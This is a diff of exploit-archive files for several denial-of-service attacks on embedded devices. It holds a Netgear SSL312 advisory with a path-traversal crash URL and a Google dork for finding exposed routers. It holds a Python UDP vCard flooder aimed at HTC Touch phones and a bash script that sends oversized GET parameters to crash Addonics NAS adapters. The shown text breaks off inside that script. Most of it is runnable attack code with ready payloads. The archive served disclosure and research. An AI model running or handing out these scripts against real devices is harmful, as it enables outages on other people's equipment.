@@ -1,73 +1,73 @@ - _ _ _____ _ ___ _____ _ _ - / / / / ____/ / / _/_ __/ / / / - / /_/ / __/ / / / / / / / /_/ / - / __ / /___/ /____/ / / / / __ / - /_/ /_/_____/_____/___/ /_/ /_/ /_/ - Helith - 0815 --------------------------------------------------------------------------------- - -Author : Rembrandt -Date : 2008-02-27 -Affected Software: propietary CGI -Affected OS : Netgear embedded Linux for the SSL312 router - Propably other devices are affected as well -Type : Denial of Service - -OSVDB : -Milw0rm : 8008 -CVE : -ISS X-Force: : -BID : 33675 - - -Trying to fix it responsible and get in contact with the vendor: - --- ZDI -- -Case Opened 2008-12-28 07:57 GMT-6 -Case Closed 2009-01-15 17:01 GMT-6 - -"After some deliberation we have unfortunately decided that we won't be -accepting bugs affecting NetGear products." --- END -- - -Contacting Netgear and mitre.org: 2009-02-01 12:25 GTM+1 -No reaction, release : 2009-02-06 23:59 GTM+1 - -Netgear VPN router SSL312 is proune to a remote DoS condition which can get -triggered if somebody has access to the webinterface of the VPN router. -The problem is related to a propietary CGI binary and makes is impossible -for users to patch the router. Further in detail analyses will show several -other issues like outdated third party software (e.g. the webserver) and further -problems in the cgi-binary itself which won't get disclosed here. - -If you download the source code the affected binary can be found at: -./NG_SSL312-GPL/uClinux/uC-src/real/EasyAccess/EasyAccess/www/cgi-bin/single_cgi - - -Steps to reproduce: - -Visit the Netgear SSL312 VPN router webinterface. -You will see a login field and a password field. -Just enter any random data and proceed. - -The URL will include a path like: -https://xxx.xxx.xxx.xxx/cgi-bin/welcome/VPN_only?err=VXNlciBMb2dpbiBGYWlsZWQ= - -If you modify the URL as below and resend your http request the device will -crash and needs a hard reboot. 
- -https://xxx.xxx.xxx.xxx/cgi-bin/welcome/VPN_only?../../../../../ - -Example network affected by this: StudiVZ - -Simple google dork: -intitle:SSL-VPN intext:password inurl:/cgi-bin/welcome - -Workaround: -Preventing others to gain access to the webinterface of the router prevents -the attack. - -Kind regards, -Rembrandt - -# milw0rm.com [2009-02-09] + _ _ _____ _ ___ _____ _ _ + / / / / ____/ / / _/_ __/ / / / + / /_/ / __/ / / / / / / / /_/ / + / __ / /___/ /____/ / / / / __ / + /_/ /_/_____/_____/___/ /_/ /_/ /_/ + Helith - 0815 +-------------------------------------------------------------------------------- + +Author : Rembrandt +Date : 2008-02-27 +Affected Software: propietary CGI +Affected OS : Netgear embedded Linux for the SSL312 router + Propably other devices are affected as well +Type : Denial of Service + +OSVDB : +Milw0rm : 8008 +CVE : +ISS X-Force: : +BID : 33675 + + +Trying to fix it responsible and get in contact with the vendor: + +-- ZDI -- +Case Opened 2008-12-28 07:57 GMT-6 +Case Closed 2009-01-15 17:01 GMT-6 + +"After some deliberation we have unfortunately decided that we won't be +accepting bugs affecting NetGear products." +-- END -- + +Contacting Netgear and mitre.org: 2009-02-01 12:25 GTM+1 +No reaction, release : 2009-02-06 23:59 GTM+1 + +Netgear VPN router SSL312 is proune to a remote DoS condition which can get +triggered if somebody has access to the webinterface of the VPN router. +The problem is related to a propietary CGI binary and makes is impossible +for users to patch the router. Further in detail analyses will show several +other issues like outdated third party software (e.g. the webserver) and further +problems in the cgi-binary itself which won't get disclosed here. + +If you download the source code the affected binary can be found at: +./NG_SSL312-GPL/uClinux/uC-src/real/EasyAccess/EasyAccess/www/cgi-bin/single_cgi + + +Steps to reproduce: + +Visit the Netgear SSL312 VPN router webinterface. 
+You will see a login field and a password field. +Just enter any random data and proceed. + +The URL will include a path like: +https://xxx.xxx.xxx.xxx/cgi-bin/welcome/VPN_only?err=VXNlciBMb2dpbiBGYWlsZWQ= + +If you modify the URL as below and resend your http request the device will +crash and needs a hard reboot. + +https://xxx.xxx.xxx.xxx/cgi-bin/welcome/VPN_only?../../../../../ + +Example network affected by this: StudiVZ + +Simple google dork: +intitle:SSL-VPN intext:password inurl:/cgi-bin/welcome + +Workaround: +Preventing others to gain access to the webinterface of the router prevents +the attack. + +Kind regards, +Rembrandt + +# milw0rm.com [2009-02-09] diff --git a/platforms/hardware/dos/8051.html b/platforms/hardware/dos/8051.html index 740526761..8f5867ff6 100755 --- a/platforms/hardware/dos/8051.html +++ b/platforms/hardware/dos/8051.html 
@@ -1,41 +1,41 @@ -Application: Nokia N95-8 -OS: Symbian ------------------------------------------------------- -1 - Description -2 - Vulnerability -3 - POC/EXPLOIT - ------------------------------------------------------- -Description - -The nokia n95 is a smartphone, this phone have more tools, for example: gps,mp3,camera,wireless. - - :) - ------------------------------------------------------- -Vulnerability - -The vulnerability is caused when the browser, opened a web with javaScript code. This cause that page crash. - -The error is in the method "setAttributeNode", because the bad implement is the cause of bug. - ------------------------------------------------------- -POC/EXPLOIT - -Enter in this url - -http://es.geocities.com/jplopezy/nokiacrash2.html - - -or make html file and insert this code - - - - ------------------------------------------------------- -Juan Pablo Lopez Yacubian - -# milw0rm.com [2009-02-13] +Application: Nokia N95-8 +OS: Symbian +------------------------------------------------------ +1 - Description +2 - Vulnerability +3 - POC/EXPLOIT + +------------------------------------------------------ +Description + +The nokia n95 is a smartphone, this phone have more tools, for example: gps,mp3,camera,wireless. + + :) + +------------------------------------------------------ +Vulnerability + +The vulnerability is caused when the browser, opened a web with javaScript code. This cause that page crash. + +The error is in the method "setAttributeNode", because the bad implement is the cause of bug. + +------------------------------------------------------ +POC/EXPLOIT + +Enter in this url + +http://es.geocities.com/jplopezy/nokiacrash2.html + + +or make html file and insert this code + + + + +------------------------------------------------------ +Juan Pablo Lopez Yacubian + +# milw0rm.com [2009-02-13] diff --git a/platforms/hardware/dos/8125.rb b/platforms/hardware/dos/8125.rb index 1348fe361..a0282eeb1 100755 
--- a/platforms/hardware/dos/8125.rb +++ b/platforms/hardware/dos/8125.rb 
@@ -1,122 +1,122 @@ -#! /usr/bin/env python -# -# Copyright (c) 2009 Mobile Security Lab www.mseclab.com -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in -# all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. 
-# - -from socket import * -from sys import exit,argv -from time import * -import random -from optparse import OptionParser - -# Global Variables -PORT = 9204 -DEF_NUM_PACKETS = 10 -DEF_VCARD_LEN = 1410 -DEF_DELAY = 0.7 -VCARD_HEADER = "BEGIN:VCARD\r\nVERSION:2.1\r\nN:" -VCARD_TRAILER = "\r\nEND:VCARD\r\n" - -def main(): - # Local variables - num_packets = DEF_NUM_PACKETS - delay = DEF_DELAY - - print "\nMSL-2008-002 PoC for HTC Touch\nMobile Security Lab 2009\n" - # Parsing options - parser = OptionParser("usage: %prog [options] target_IP") - parser.add_option("-s", "--silence", action="store_true", dest="silence", help="send silent vcards (32k)") - parser.add_option("-c", "--count", type="int", help="specify vcard length", dest="count") - parser.add_option("-d", "--delay", type="float", help="specify delay between packets", dest="delay") - parser.add_option("-l", "--len", type="int", help="specify vcard length", dest="len") - parser.add_option("-t", "--text", type="string", help="specify vcard body text", dest="text") - - # Parse input - (options, args) = parser.parse_args() - if len(args) != 1: - parser.print_help() - print "" - exit(1) - - if options.count: - num_packets = options.count - - if options.delay: - delay = options.delay - - if options.silence: - vcard_body = VCARD_HEADER+'A' *32722+VCARD_TRAILER - elif options.len: - vcard_body = VCARD_HEADER+'A' *options.len+VCARD_TRAILER - elif options.text: - vcard_body = VCARD_HEADER+options.text+VCARD_TRAILER - else: - vcard_body = VCARD_HEADER+'A' *DEF_VCARD_LEN+VCARD_TRAILER - - # Socket creation - udp_sock = socket(AF_INET, SOCK_DGRAM) - ADDR = (args[0],PORT) - - # Start sending packet - counter = 1 - c_lap = 0 - total_data = 0 - print "Sending %d packets... 
to %s" % (num_packets,ADDR) - start_time = time() - start_lap = time() - - # Start sending packet - while counter <= num_packets: - len_sent = udp_sock.sendto(vcard_body,ADDR) - if len_sent != len(vcard_body): - print "Error sending packet n.%d" %counter - break - - # Update Counter - counter += 1 - c_lap += 1 - total_data += len_sent - - # Sleep for letting the device parse vcards - sleep(delay) - - # Check number of packets in a second - local_lap = time() - if local_lap - start_lap >= 1: - print "%0.2f packets/sec" % (c_lap/(local_lap - start_lap)) - start_lap = local_lap - c_lap = 0 - - stop_time = time() - stop_sec = stop_time - start_time - - # Display info - print "Sent %d packets in %f seconds" % (num_packets, stop_sec) - print "Start time: %s" %ctime(start_time) - print "Stop time: %s" %ctime(stop_time) - print "Payload Len = %d bytes" % len(vcard_body) - print "Total Data sent = %d bytes (about %0.2f kB)" % (total_data, (float(total_data)/float(1024))) - -#Global start -if __name__ == "__main__": - main() - -# milw0rm.com [2009-03-02] +#! /usr/bin/env python +# +# Copyright (c) 2009 Mobile Security Lab www.mseclab.com +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. +# + +from socket import * +from sys import exit,argv +from time import * +import random +from optparse import OptionParser + +# Global Variables +PORT = 9204 +DEF_NUM_PACKETS = 10 +DEF_VCARD_LEN = 1410 +DEF_DELAY = 0.7 +VCARD_HEADER = "BEGIN:VCARD\r\nVERSION:2.1\r\nN:" +VCARD_TRAILER = "\r\nEND:VCARD\r\n" + +def main(): + # Local variables + num_packets = DEF_NUM_PACKETS + delay = DEF_DELAY + + print "\nMSL-2008-002 PoC for HTC Touch\nMobile Security Lab 2009\n" + # Parsing options + parser = OptionParser("usage: %prog [options] target_IP") + parser.add_option("-s", "--silence", action="store_true", dest="silence", help="send silent vcards (32k)") + parser.add_option("-c", "--count", type="int", help="specify vcard length", dest="count") + parser.add_option("-d", "--delay", type="float", help="specify delay between packets", dest="delay") + parser.add_option("-l", "--len", type="int", help="specify vcard length", dest="len") + parser.add_option("-t", "--text", type="string", help="specify vcard body text", dest="text") + + # Parse input + (options, args) = parser.parse_args() + if len(args) != 1: + parser.print_help() + print "" + exit(1) + + if options.count: + num_packets = options.count + + if options.delay: + delay = options.delay + + if options.silence: + vcard_body = VCARD_HEADER+'A' *32722+VCARD_TRAILER + elif options.len: + vcard_body = VCARD_HEADER+'A' *options.len+VCARD_TRAILER + elif options.text: + vcard_body = VCARD_HEADER+options.text+VCARD_TRAILER + else: + vcard_body = VCARD_HEADER+'A' *DEF_VCARD_LEN+VCARD_TRAILER + + # Socket creation + udp_sock = socket(AF_INET, SOCK_DGRAM) + ADDR = (args[0],PORT) + + # Start sending packet + counter = 1 + c_lap = 0 + total_data = 0 + print 
"Sending %d packets... to %s" % (num_packets,ADDR) + start_time = time() + start_lap = time() + + # Start sending packet + while counter <= num_packets: + len_sent = udp_sock.sendto(vcard_body,ADDR) + if len_sent != len(vcard_body): + print "Error sending packet n.%d" %counter + break + + # Update Counter + counter += 1 + c_lap += 1 + total_data += len_sent + + # Sleep for letting the device parse vcards + sleep(delay) + + # Check number of packets in a second + local_lap = time() + if local_lap - start_lap >= 1: + print "%0.2f packets/sec" % (c_lap/(local_lap - start_lap)) + start_lap = local_lap + c_lap = 0 + + stop_time = time() + stop_sec = stop_time - start_time + + # Display info + print "Sent %d packets in %f seconds" % (num_packets, stop_sec) + print "Start time: %s" %ctime(start_time) + print "Stop time: %s" %ctime(stop_time) + print "Payload Len = %d bytes" % len(vcard_body) + print "Total Data sent = %d bytes (about %0.2f kB)" % (total_data, (float(total_data)/float(1024))) + +#Global start +if __name__ == "__main__": + main() + +# milw0rm.com [2009-03-02] diff --git a/platforms/hardware/dos/8187.sh b/platforms/hardware/dos/8187.sh index 70af66c31..bfea18c97 100755 --- a/platforms/hardware/dos/8187.sh +++ b/platforms/hardware/dos/8187.sh 
@@ -1,68 +1,68 @@ -#!/bin/bash -###################################################### -# Addonics NAS Adapter Post-Auth DoS -# Tested against R3282-1.33c LOADER32 1.15, and NASU2FW41 Loader 1.17 -# Coded by Mike Cyr, aka h00die -# mcyr2 at csc dot_____________com -# Notes: Any of these BoF crashes the entire stack from the web GUI -# so throw a GET, and bye bye baby! -# Greetz to muts and loganWHD, I tried harder -# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily -# Log: Vendor notification feb 9, 2009 for BoF in R3282-1.33c LOADER32 1.15 firmware -# March 8, 2009: Second vendor notification for BoF in NASU2FW41 Loader 1.17 firmware -# March 9, 2009: Code release on Milw0rm, Bid sent. -###################################################### - -echo "Addonics NAS Adapter Post-Auth DoS" -echo "Written by H00die" - -echo "------------------------" -echo "Addonics IP:" -read -e IP -echo "Addonics GUI Username:" -read -e USERNAME -echo "Addonics GUI Password:" -read -e PASSWORD - -echo "-----------------------" -echo "Select Buffer:" -echo "1. FTP: Username (R3282-1.33c LOADER32 1.15)" -echo "2. FTP: Password (R3282-1.33c LOADER32 1.15)" -echo "3. SMB: Username (R3282-1.33c LOADER32 1.15)" -echo "4. SMB: Password (R3282-1.33c LOADER32 1.15, NASU2FW41 Loader 1.17)" -echo "5. FTP: Username (NASU2FW41 Loader 1.17)" -echo "6. FTP: Password (NASU2FW41 Loader 1.17)" -echo "7. 
SMB: Username (NASU2FW41 Loader 1.17)" - -read -e BOF - -echo "" -echo "-----------------------" -echo "Sending Malicious GET request" -case "$BOF" in -'1') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Account_passwd=a&ftp_att=W;" -;; -'2') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=a&Account_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ftp_att=W;" -;; -'3') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD 
"http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data1=test&data2=0;" -;; -'4') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=a&data1=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data2=0;" -;; -'5') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD 
"http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Account_passwd=a&ftp_att=W;" -;; -'6') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=a&Account_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ftp_att=W;" -;; -'7') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD 
"http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data1=test&data2=0;" -;; -esac - -echo "Stack Smashed..." - -# milw0rm.com [2009-03-09] +#!/bin/bash +###################################################### +# Addonics NAS Adapter Post-Auth DoS +# Tested against R3282-1.33c LOADER32 1.15, and NASU2FW41 Loader 1.17 +# Coded by Mike Cyr, aka h00die +# mcyr2 at csc dot_____________com +# Notes: Any of these BoF crashes the entire stack from the web GUI +# so throw a GET, and bye bye baby! +# Greetz to muts and loganWHD, I tried harder +# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily +# Log: Vendor notification feb 9, 2009 for BoF in R3282-1.33c LOADER32 1.15 firmware +# March 8, 2009: Second vendor notification for BoF in NASU2FW41 Loader 1.17 firmware +# March 9, 2009: Code release on Milw0rm, Bid sent. +###################################################### + +echo "Addonics NAS Adapter Post-Auth DoS" +echo "Written by H00die" + +echo "------------------------" +echo "Addonics IP:" +read -e IP +echo "Addonics GUI Username:" +read -e USERNAME +echo "Addonics GUI Password:" +read -e PASSWORD + +echo "-----------------------" +echo "Select Buffer:" +echo "1. FTP: Username (R3282-1.33c LOADER32 1.15)" +echo "2. FTP: Password (R3282-1.33c LOADER32 1.15)" +echo "3. SMB: Username (R3282-1.33c LOADER32 1.15)" +echo "4. 
SMB: Password (R3282-1.33c LOADER32 1.15, NASU2FW41 Loader 1.17)" +echo "5. FTP: Username (NASU2FW41 Loader 1.17)" +echo "6. FTP: Password (NASU2FW41 Loader 1.17)" +echo "7. SMB: Username (NASU2FW41 Loader 1.17)" + +read -e BOF + +echo "" +echo "-----------------------" +echo "Sending Malicious GET request" +case "$BOF" in +'1') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Account_passwd=a&ftp_att=W;" +;; +'2') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=a&Account_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ftp_att=W;" +;; +'3') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD 
"http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data1=test&data2=0;" +;; +'4') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD 